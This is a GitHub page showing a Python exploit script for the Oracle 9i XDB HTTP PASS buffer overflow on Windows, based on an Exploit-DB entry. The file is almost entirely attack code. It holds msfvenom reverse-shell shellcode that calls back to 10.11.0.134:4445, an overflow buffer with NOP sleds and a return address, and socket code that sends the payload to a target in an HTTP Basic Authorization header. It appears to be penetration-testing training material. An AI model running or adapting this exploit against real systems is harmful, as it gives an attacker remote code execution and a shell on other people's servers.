forked from timip/exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathoracle9i_xdb_http_pass.py
More file actions
57 lines (50 loc) · 2.61 KB
/
oracle9i_xdb_http_pass.py
File metadata and controls
57 lines (50 loc) · 2.61 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Exploit for Oracle 9i XDB HTTP PASS Overflow (win32)
# Based on https://www.exploit-db.com/exploits/16809/
# By TIMLAB timip.net
# Use in the form "python oracle9i_xdb_http_pass.py <Target IP Address> <Target Port No.>"
# Target Port No. = 8080
import sys, socket, base64
# Please replace it with your shellcode!!!!!!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.134 LPORT=4445 -b '\x00' -f python
buf = ""
buf += "\xd9\xc4\xbb\x69\x6e\xb8\x34\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x34\x7d\x5a"
buf += "\xc1\x3a\x69\x18\x2a\xc2\x6a\x7d\xa2\x27\x5b\xbd\xd0"
buf += "\x2c\xcc\x0d\x92\x60\xe1\xe6\xf6\x90\x72\x8a\xde\x97"
buf += "\x33\x21\x39\x96\xc4\x1a\x79\xb9\x46\x61\xae\x19\x76"
buf += "\xaa\xa3\x58\xbf\xd7\x4e\x08\x68\x93\xfd\xbc\x1d\xe9"
buf += "\x3d\x37\x6d\xff\x45\xa4\x26\xfe\x64\x7b\x3c\x59\xa7"
buf += "\x7a\x91\xd1\xee\x64\xf6\xdc\xb9\x1f\xcc\xab\x3b\xc9"
buf += "\x1c\x53\x97\x34\x91\xa6\xe9\x71\x16\x59\x9c\x8b\x64"
buf += "\xe4\xa7\x48\x16\x32\x2d\x4a\xb0\xb1\x95\xb6\x40\x15"
buf += "\x43\x3d\x4e\xd2\x07\x19\x53\xe5\xc4\x12\x6f\x6e\xeb"
buf += "\xf4\xf9\x34\xc8\xd0\xa2\xef\x71\x41\x0f\x41\x8d\x91"
buf += "\xf0\x3e\x2b\xda\x1d\x2a\x46\x81\x49\x9f\x6b\x39\x8a"
buf += "\xb7\xfc\x4a\xb8\x18\x57\xc4\xf0\xd1\x71\x13\xf6\xcb"
buf += "\xc6\x8b\x09\xf4\x36\x82\xcd\xa0\x66\xbc\xe4\xc8\xec"
buf += "\x3c\x08\x1d\xa2\x6c\xa6\xce\x03\xdc\x06\xbf\xeb\x36"
buf += "\x89\xe0\x0c\x39\x43\x89\xa7\xc0\x04\xbc\x3c\xca\x52"
buf += "\xa8\x40\xca\x4b\x74\xcc\x2c\x01\x96\x98\xe7\xbe\x0f"
buf += "\x81\x73\x5e\xcf\x1f\xfe\x60\x5b\xac\xff\x2f\xac\xd9"
buf += "\x13\xc7\x5c\x94\x49\x4e\x62\x02\xe5\x0c\xf1\xc9\xf5"
buf += "\x5b\xea\x45\xa2\x0c\xdc\x9f\x26\xa1\x47\x36\x54\x38"
buf += "\x11\x71\xdc\xe7\xe2\x7c\xdd\x6a\x5e\x5b\xcd\xb2\x5f"
buf += "\xe7\xb9\x6a\x36\xb1\x17\xcd\xe0\x73\xc1\x87\x5f\xda"
buf += "\x85\x5e\xac\xdd\xd3\x5e\xf9\xab\x3b\xee\x54\xea\x44"
buf += "\xdf\x30\xfa\x3d\x3d\xa1\x05\x94\x85\xd1\x4f\xb4\xac"
buf += "\x79\x16\x2d\xed\xe7\xa9\x98\x32\x1e\x2a\x28\xcb\xe5"
buf += "\x32\x59\xce\xa2\xf4\xb2\xa2\xbb\x90\xb4\x11\xbb\xb0"
host = sys.argv[1]
port = sys.argv[2]
ret = "\x46\x6d\x61\x60"
prependEncoder = "\x81\xc4\xff\xef\xff\xff\x44"
prep = "\x41" * 4 + ":" + "\x41" * 442
prep += "\xeb\x64" + "\x90" * 2 + ret
prep += "\x90" * 266 + "\xeb\x10" + "\x90" * 109 + prependEncoder + buf
prep = base64.b64encode(prep)
exploit = "GET / HTTP/1.1\x0d\x0a" + "Host: " + host + ":" + port + "\x0d\x0aAuthorization: Basic " + prep + "\x0d\x0a\x0d\x0a"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, int(port)))
client.sendall(exploit)
client.close()
print 'Done! Try harder!'